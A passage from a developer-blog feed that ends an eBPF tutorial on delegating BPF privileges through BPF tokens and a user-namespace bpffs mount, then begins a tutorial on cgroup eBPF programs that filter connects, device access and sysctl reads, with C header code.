&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;bpf-developer-tutorial/src/features/bpf_token
bash setup_token_bpffs.sh /tmp/bpf-token
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This mounts bpffs at &lt;code&gt;/tmp/bpf-token&lt;/code&gt; with:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;delegate_cmds=prog_load:map_create:btf_load:link_create
delegate_maps=array
delegate_progs=xdp:socket_filter
delegate_attachs=any
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Why &lt;code&gt;socket_filter&lt;/code&gt;?&lt;/strong&gt; libbpf performs a trivial program-load probe before loading the real BPF object. This probe uses a generic &lt;code&gt;BPF_PROG_TYPE_SOCKET_FILTER&lt;/code&gt; program to detect kernel feature support. Without &lt;code&gt;socket_filter&lt;/code&gt; in the delegation policy, the probe fails and libbpf refuses to proceed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why &lt;code&gt;delegate_attachs=any&lt;/code&gt;?&lt;/strong&gt; The same libbpf probe path also triggers attach-type validation in the kernel's token checking code. Using &lt;code&gt;any&lt;/code&gt; avoids having to enumerate every possible attach type for probe compatibility.&lt;/p&gt;

&lt;p&gt;Note that a host-namespace mount like this is useful for inspecting the delegation policy (e.g., with &lt;code&gt;bpftool token list&lt;/code&gt;), but it won't produce working tokens unless the &lt;code&gt;BPF_TOKEN_CREATE&lt;/code&gt; command is issued from a matching non-init user namespace.&lt;/p&gt;
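&lt;p&gt;The four delegation settings listed above travel as ordinary bpffs mount options: options are separated by commas, and the values inside one option by colons. The sketch below assembles such an option string and prints the resulting &lt;code&gt;mount&lt;/code&gt; command without running it. The &lt;code&gt;delegate_opts&lt;/code&gt; helper is hypothetical, and the printed command is an assumed equivalent of what the helper script does, since the script's contents are not shown here.&lt;/p&gt;

```shell
#!/bin/sh
# Hypothetical helper: joins the four delegation settings into one
# comma-separated string suitable for "mount -o".
# $1 = commands, $2 = map types, $3 = program types, $4 = attach types
delegate_opts() {
    echo "delegate_cmds=$1,delegate_maps=$2,delegate_progs=$3,delegate_attachs=$4"
}

opts=$(delegate_opts \
    "prog_load:map_create:btf_load:link_create" \
    "array" \
    "xdp:socket_filter" \
    "any")

# Print the command instead of executing it; the real mount needs root.
echo "mount -t bpf -o $opts bpffs /tmp/bpf-token"
```

&lt;p&gt;Printing the command first makes it easy to review the policy before a privileged process applies it.&lt;/p&gt;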

&lt;h2&gt;
  
  
  Compilation and Execution
&lt;/h2&gt;

&lt;p&gt;Build all binaries:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;cd &lt;/span&gt;bpf-developer-tutorial/src/features/bpf_token
make
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Run the end-to-end demo:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./token_userns_demo
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Expected output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;token path     : /proc/self/fd/5
interface      : lo (ifindex=1)
packets before : 0
packets after  : 1
delta          : 1
last ifindex   : 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;delta: 1&lt;/code&gt; confirms that the XDP program was successfully loaded and attached using a BPF token, even though the child process holds neither &lt;code&gt;CAP_BPF&lt;/code&gt; nor &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; in the initial user namespace.&lt;/p&gt;

&lt;p&gt;Add &lt;code&gt;-v&lt;/code&gt; for verbose libbpf output to see the token being created and used:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;sudo&lt;/span&gt; ./token_userns_demo &lt;span class="nt"&gt;-v&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;If you already manage your own delegated bpffs in a user namespace, you can run the loader directly:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;./token_trace &lt;span class="nt"&gt;-t&lt;/span&gt; /proc/self/fd/&amp;lt;mnt-fd&amp;gt; &lt;span class="nt"&gt;-i&lt;/span&gt; lo
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  Real-World Applications
&lt;/h2&gt;

&lt;p&gt;While this tutorial uses a minimal XDP program, the BPF token pattern scales to production scenarios:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Container runtimes&lt;/strong&gt; (LXD, Docker, Kubernetes): Mount a delegated bpffs into a container with only the program and map types the workload needs. LXD already supports this through its &lt;code&gt;security.delegate_bpf&lt;/code&gt; option.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;CI/CD testing&lt;/strong&gt;: Give build jobs the ability to load and test specific eBPF programs without granting them host-level capabilities. The delegation policy acts as an allowlist for BPF operations.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Multi-tenant BPF platforms&lt;/strong&gt;: A platform daemon creates per-tenant bpffs mounts with different delegation policies. One tenant might be allowed XDP + array maps, while another might get tracepoint + ringbuf access.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;LSM integration&lt;/strong&gt;: Because BPF tokens integrate with Linux Security Modules, you can combine token delegation with SELinux or AppArmor policies for defense-in-depth. Each token gets its own security context that LSM hooks can inspect.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Summary
&lt;/h2&gt;

&lt;p&gt;In this tutorial, we learned how BPF token provides a delegation model for eBPF privilege that goes beyond the binary "all or nothing" of Linux capabilities. We walked through the complete flow: a privileged parent configures a bpffs instance with specific delegation options, an unprivileged child in a user namespace derives a token from that bpffs, and libbpf transparently uses the token for map creation, program loading, and attachment. The result is a minimal XDP program running in an unprivileged context, something that was impossible before Linux 6.9.&lt;/p&gt;

&lt;p&gt;BPF token is not a niche feature. It represents the kernel's answer to a fundamental question in the eBPF ecosystem: how do you safely share BPF capabilities in a multi-tenant world without granting unconstrained access to the BPF subsystem?&lt;/p&gt;

&lt;p&gt;If you'd like to learn more about eBPF, visit our tutorial code repository at &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial&lt;/a&gt; or our website at &lt;a href="https://eunomia.dev/tutorials/" rel="noopener noreferrer"&gt;https://eunomia.dev/tutorials/&lt;/a&gt; for more examples and complete tutorials.&lt;/p&gt;

&lt;h2&gt;
  
  
  References
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://docs.ebpf.io/linux/concepts/token/" rel="noopener noreferrer"&gt;BPF Token concept documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://lore.kernel.org/bpf/20240103222034.2582628-1-andrii@kernel.org/T/" rel="noopener noreferrer"&gt;BPF token kernel patch series (Andrii Nakryiko)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://lwn.net/Articles/959350/" rel="noopener noreferrer"&gt;BPF token LWN article&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://lwn.net/Articles/947173/" rel="noopener noreferrer"&gt;Finer-grained BPF tokens LWN discussion&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://documentation.ubuntu.com/lxd/latest/explanation/bpf/" rel="noopener noreferrer"&gt;Privilege delegation using BPF Token (LXD documentation)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.ebpf.io/ebpf-library/libbpf/userspace/bpf_token_create/" rel="noopener noreferrer"&gt;bpf_token_create() libbpf API&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.kernel.org/bpf/" rel="noopener noreferrer"&gt;Linux kernel BPF documentation&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>ebpf</category>
      <category>tutorial</category>
      <category>linux</category>
    </item>
    <item>
      <title>eBPF Tutorial: cgroup-based Policy Control</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 24 Feb 2026 07:43:56 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-cgroup-based-policy-control-1k2d</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-cgroup-based-policy-control-1k2d</guid>
      <description>&lt;p&gt;Do you need to enforce network access control on containers or specific process groups without affecting the entire system? Or do you need to restrict certain processes from accessing specific devices while allowing others to use them normally? Traditional iptables and device permissions are global, making fine-grained per-process-group control impossible.&lt;/p&gt;

&lt;p&gt;This is the problem &lt;strong&gt;cgroup eBPF&lt;/strong&gt; solves. By attaching eBPF programs to cgroups (control groups), you can implement policy control based on process membership—only processes belonging to a specific cgroup are affected. This enables container isolation, multi-tenant security, and sandbox environments. In this tutorial, we'll build a complete "policy guard" program that demonstrates TCP connection filtering, device access control, and sysctl read restrictions—three types of cgroup eBPF usage.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is cgroup eBPF?
&lt;/h2&gt;

&lt;p&gt;The core idea of cgroup eBPF is simple: attach an eBPF program to a cgroup, and all processes in that cgroup will be controlled by this program. Unlike XDP/tc, which filter traffic by network interface, cgroup eBPF filters by process membership: put a container in a cgroup, attach a policy program, and that container's network access, device access, and sysctl reads/writes are all under your control. Processes in other cgroups are completely unaffected.&lt;/p&gt;

&lt;p&gt;This model is well suited to container and multi-tenant scenarios. Kubernetes networking implementations such as Cilium attach cgroup eBPF programs to handle socket-level operations for pods (for example, socket-level load balancing of service traffic). You can also use it for device isolation (e.g., restricting which containers can access GPUs), security sandboxes (preventing reads of sensitive sysctls), and more. When a cgroup eBPF program denies an operation, the corresponding syscall fails in userspace with &lt;code&gt;errno&lt;/code&gt; set to &lt;code&gt;EPERM&lt;/code&gt; (Operation not permitted).&lt;/p&gt;
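
&lt;p&gt;To make the &lt;code&gt;EPERM&lt;/code&gt; behavior concrete, here is a minimal userspace sketch of how an application inside the cgroup might recognize a denial. The helpers &lt;code&gt;denied_by_policy()&lt;/code&gt; and &lt;code&gt;report()&lt;/code&gt; are hypothetical names made up for this illustration and are not part of the tutorial sources. Keep in mind that &lt;code&gt;EPERM&lt;/code&gt; can also come from other kernel mechanisms, so it only hints at a cgroup eBPF policy.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;#include &amp;lt;errno.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;string.h&amp;gt;

/* Hypothetical helper (not from the tutorial sources): rc is the return
 * value of a syscall such as connect() or open(), and err is the errno
 * value saved immediately after the call. Returns 1 when the failure
 * looks like a policy denial, 0 otherwise. */
int denied_by_policy(int rc, int err)
{
    return rc == -1 &amp;amp;&amp;amp; err == EPERM;
}

/* Print a short diagnostic line for the outcome of a call. */
void report(const char *what, int rc, int err)
{
    if (denied_by_policy(rc, err))
        printf("%s: blocked (EPERM), possibly by a cgroup eBPF policy\n", what);
    else if (rc == -1)
        printf("%s: failed: %s\n", what, strerror(err));
    else
        printf("%s: ok\n", what);
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;A caller would save &lt;code&gt;errno&lt;/code&gt; right after the failing syscall and pass it in, for example &lt;code&gt;report("connect", rc, errno)&lt;/code&gt;.&lt;/p&gt;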

&lt;h2&gt;
  
  
  cgroup eBPF Hook Points
&lt;/h2&gt;

&lt;h3&gt;
  
  
  1. &lt;code&gt;BPF_PROG_TYPE_CGROUP_SOCK_ADDR&lt;/code&gt; - Socket Address Hooks
&lt;/h3&gt;

&lt;p&gt;Triggered on socket address syscalls (bind/connect/sendmsg/recvmsg):&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hook&lt;/th&gt;
&lt;th&gt;Section Name&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;IPv4 bind&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/bind4&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter bind() calls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IPv6 bind&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/bind6&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter bind() calls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IPv4 connect&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/connect4&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter connect() calls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IPv6 connect&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/connect6&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter connect() calls&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UDP sendmsg&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cgroup/sendmsg4&lt;/code&gt;, &lt;code&gt;cgroup/sendmsg6&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Filter UDP sends&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;UDP recvmsg&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;cgroup/recvmsg4&lt;/code&gt;, &lt;code&gt;cgroup/recvmsg6&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Filter UDP receives&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Unix connect&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/connect_unix&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter Unix socket connect&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Context&lt;/strong&gt;: &lt;code&gt;struct bpf_sock_addr&lt;/code&gt; - contains &lt;code&gt;user_ip4&lt;/code&gt;, &lt;code&gt;user_port&lt;/code&gt; (network byte order)&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Return semantics&lt;/strong&gt;: &lt;code&gt;return 1&lt;/code&gt; = allow, &lt;code&gt;return 0&lt;/code&gt; = deny (EPERM)&lt;/p&gt;
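
&lt;p&gt;The byte-order detail and the return convention are easy to get wrong, so the following userspace model may help. It is only a sketch: &lt;code&gt;connect_verdict()&lt;/code&gt; is a hypothetical function invented here, and treating a blocked port of 0 as "no rule configured" is an assumption of this example. It converts the network-order port to host order before comparing, then returns 1 to allow or 0 to deny.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;#include &amp;lt;arpa/inet.h&amp;gt;
#include &amp;lt;stdint.h&amp;gt;

/* Hypothetical userspace model of a connect4 port check.
 * user_port_be: destination port in network byte order, as stored in
 *               the user_port field of struct bpf_sock_addr.
 * blocked_port: port to block, in host byte order (0 = nothing blocked,
 *               an assumption of this sketch).
 * Returns 1 to allow and 0 to deny, mirroring the hook's convention. */
int connect_verdict(uint16_t user_port_be, uint16_t blocked_port)
{
    if (blocked_port == 0)
        return 1;

    /* Convert to host order before comparing with the configured port. */
    return ntohs(user_port_be) == blocked_port ? 0 : 1;
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Comparing the raw network-order value against a host-order port would silently never match on little-endian machines, which is why the conversion comes first.&lt;/p&gt;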

&lt;h3&gt;
  
  
  2. &lt;code&gt;BPF_PROG_TYPE_CGROUP_DEVICE&lt;/code&gt; - Device Access Control
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hook&lt;/th&gt;
&lt;th&gt;Section Name&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Device access&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/dev&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter device open/read/write/mknod&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Context&lt;/strong&gt;: &lt;code&gt;struct bpf_cgroup_dev_ctx&lt;/code&gt; - contains &lt;code&gt;major&lt;/code&gt;, &lt;code&gt;minor&lt;/code&gt;, &lt;code&gt;access_type&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Return semantics&lt;/strong&gt;: &lt;code&gt;return 0&lt;/code&gt; = deny (EPERM), non-zero = allow&lt;/p&gt;

&lt;h3&gt;
  
  
  3. &lt;code&gt;BPF_PROG_TYPE_CGROUP_SYSCTL&lt;/code&gt; - Sysctl Access Control
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Hook&lt;/th&gt;
&lt;th&gt;Section Name&lt;/th&gt;
&lt;th&gt;Description&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Sysctl access&lt;/td&gt;
&lt;td&gt;&lt;code&gt;cgroup/sysctl&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Filter /proc/sys reads/writes&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Context&lt;/strong&gt;: &lt;code&gt;struct bpf_sysctl&lt;/code&gt; - use &lt;code&gt;bpf_sysctl_get_name()&lt;/code&gt; to get sysctl name&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Return semantics&lt;/strong&gt;: &lt;code&gt;return 0&lt;/code&gt; = reject (EPERM), &lt;code&gt;return 1&lt;/code&gt; = proceed&lt;/p&gt;

&lt;h3&gt;
  
  
  4. Other cgroup Hooks
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;cgroup_skb/ingress&lt;/code&gt;, &lt;code&gt;cgroup_skb/egress&lt;/code&gt; - Packet-level filtering&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cgroup/getsockopt&lt;/code&gt;, &lt;code&gt;cgroup/setsockopt&lt;/code&gt; - Socket option filtering&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;cgroup/sock_create&lt;/code&gt;, &lt;code&gt;cgroup/sock_release&lt;/code&gt; - Socket lifecycle&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;sockops&lt;/code&gt; - TCP-level optimization (attached via &lt;code&gt;BPF_CGROUP_SOCK_OPS&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  This Tutorial: cgroup Policy Guard
&lt;/h2&gt;

&lt;p&gt;We implement a single eBPF object with three programs:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Network (TCP)&lt;/strong&gt;: Block &lt;code&gt;connect()&lt;/code&gt; to a specified destination port&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Device&lt;/strong&gt;: Block access to a specified &lt;code&gt;major:minor&lt;/code&gt; device&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sysctl&lt;/strong&gt;: Block reads of a specified sysctl (only reads are blocked, which is safer for testing)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Events are sent to userspace via ringbuf for observability.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Shared Header: cgroup_guard.h
&lt;/h3&gt;

&lt;p&gt;This header defines data structures shared between kernel and userspace:&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause&lt;/span&gt;
&lt;span class="cp"&gt;#ifndef __CGROUP_GUARD_H
#define __CGROUP_GUARD_H
&lt;/span&gt;
&lt;span class="cp"&gt;#ifndef TASK_COMM_LEN
#define TASK_COMM_LEN 16
#endif
&lt;/span&gt;
&lt;span class="cp"&gt;#define SYSCTL_NAME_LEN 64
&lt;/span&gt;
&lt;span class="k"&gt;enum&lt;/span&gt; &lt;span class="n"&gt;event_type&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;EVENT_CONNECT4&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;EVENT_DEVICE&lt;/span&gt;   &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;EVENT_SYSCTL&lt;/span&gt;   &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;ts_ns&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;pid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;comm&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;TASK_COMM_LEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;

    &lt;span class="k"&gt;union&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;daddr&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="cm"&gt;/* IPv4, network order */&lt;/span&gt;
            &lt;span class="n"&gt;__u16&lt;/span&gt; &lt;span class="n"&gt;dport&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="cm"&gt;/* host order */&lt;/span&gt;
            &lt;span class="n"&gt;__u16&lt;/span&gt; &lt;span class="n"&gt;proto&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="cm"&gt;/* e.g. 6 for TCP */&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;connect4&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;major&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;minor&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;access_type&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;device&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="n"&gt;__u32&lt;/span&gt; &lt;span class="n"&gt;write&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="n"&gt;SYSCTL_NAME_LEN&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;sysctl&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="cp"&gt;#endif &lt;/span&gt;&lt;span class="cm"&gt;/* __CGROUP_GUARD_H */&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The &lt;code&gt;event&lt;/code&gt; structure uses a union to store type-specific data for different events, saving space while maintaining a unified event format.&lt;/p&gt;
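
&lt;p&gt;As an illustration of how a consumer might read this union, the sketch below selects the member that matches &lt;code&gt;type&lt;/code&gt;. It is not the tutorial's userspace code: &lt;code&gt;format_event()&lt;/code&gt; is a hypothetical helper, and the struct is re-declared locally with &lt;code&gt;&amp;lt;stdint.h&amp;gt;&lt;/code&gt; types instead of &lt;code&gt;__u32&lt;/code&gt;/&lt;code&gt;__u64&lt;/code&gt; so that the example compiles on its own.&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;#include &amp;lt;stdint.h&amp;gt;
#include &amp;lt;stdio.h&amp;gt;

/* Local mirror of the layout in cgroup_guard.h, using &amp;lt;stdint.h&amp;gt; types
 * in place of __u32/__u64 so the sketch is self-contained. */
enum event_type { EVENT_CONNECT4 = 1, EVENT_DEVICE = 2, EVENT_SYSCTL = 3 };

struct event {
    uint64_t ts_ns;
    uint32_t pid;
    uint32_t type;
    char comm[16];
    union {
        struct { uint32_t daddr; uint16_t dport; uint16_t proto; } connect4;
        struct { uint32_t major; uint32_t minor; uint32_t access_type; } device;
        struct { uint32_t write; char name[64]; } sysctl;
    };
};

/* Hypothetical formatter: reads only the union member selected by
 * e-&amp;gt;type. Returns the number of characters snprintf() would write. */
int format_event(const struct event *e, char *buf, size_t len)
{
    switch (e-&amp;gt;type) {
    case EVENT_CONNECT4:
        return snprintf(buf, len, "connect4 dport=%u proto=%u",
                        (unsigned)e-&amp;gt;connect4.dport,
                        (unsigned)e-&amp;gt;connect4.proto);
    case EVENT_DEVICE:
        return snprintf(buf, len, "device %u:%u access=0x%x",
                        (unsigned)e-&amp;gt;device.major,
                        (unsigned)e-&amp;gt;device.minor,
                        (unsigned)e-&amp;gt;device.access_type);
    case EVENT_SYSCTL:
        /* %.64s caps the read in case name is not NUL-terminated. */
        return snprintf(buf, len, "sysctl %s %.64s",
                        e-&amp;gt;sysctl.write ? "write" : "read",
                        e-&amp;gt;sysctl.name);
    default:
        return snprintf(buf, len, "unknown event type %u",
                        (unsigned)e-&amp;gt;type);
    }
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

&lt;p&gt;Because every member shares the same storage, reading a member that does not match &lt;code&gt;type&lt;/code&gt; would yield meaningless values, so the &lt;code&gt;switch&lt;/code&gt; on &lt;code&gt;type&lt;/code&gt; is what keeps the access well defined.&lt;/p&gt;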

&lt;h3&gt;
  
  
  eBPF Program: cgroup_guard.bpf.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause&lt;/span&gt;
&lt;span class="cm"&gt;/* cgroup_guard.bpf.c - cgroup eBPF policy guard
 *
 * This program demonstrates three types of cgroup eBPF hooks:
 * 1. cgroup/connect4 - TCP connection filtering
 * 2. cgroup/dev - Device access control
 * 3. cgroup/sysctl - Sysctl read/write control
 */&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"vmlinux.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_endian.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"cgroup_guard.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
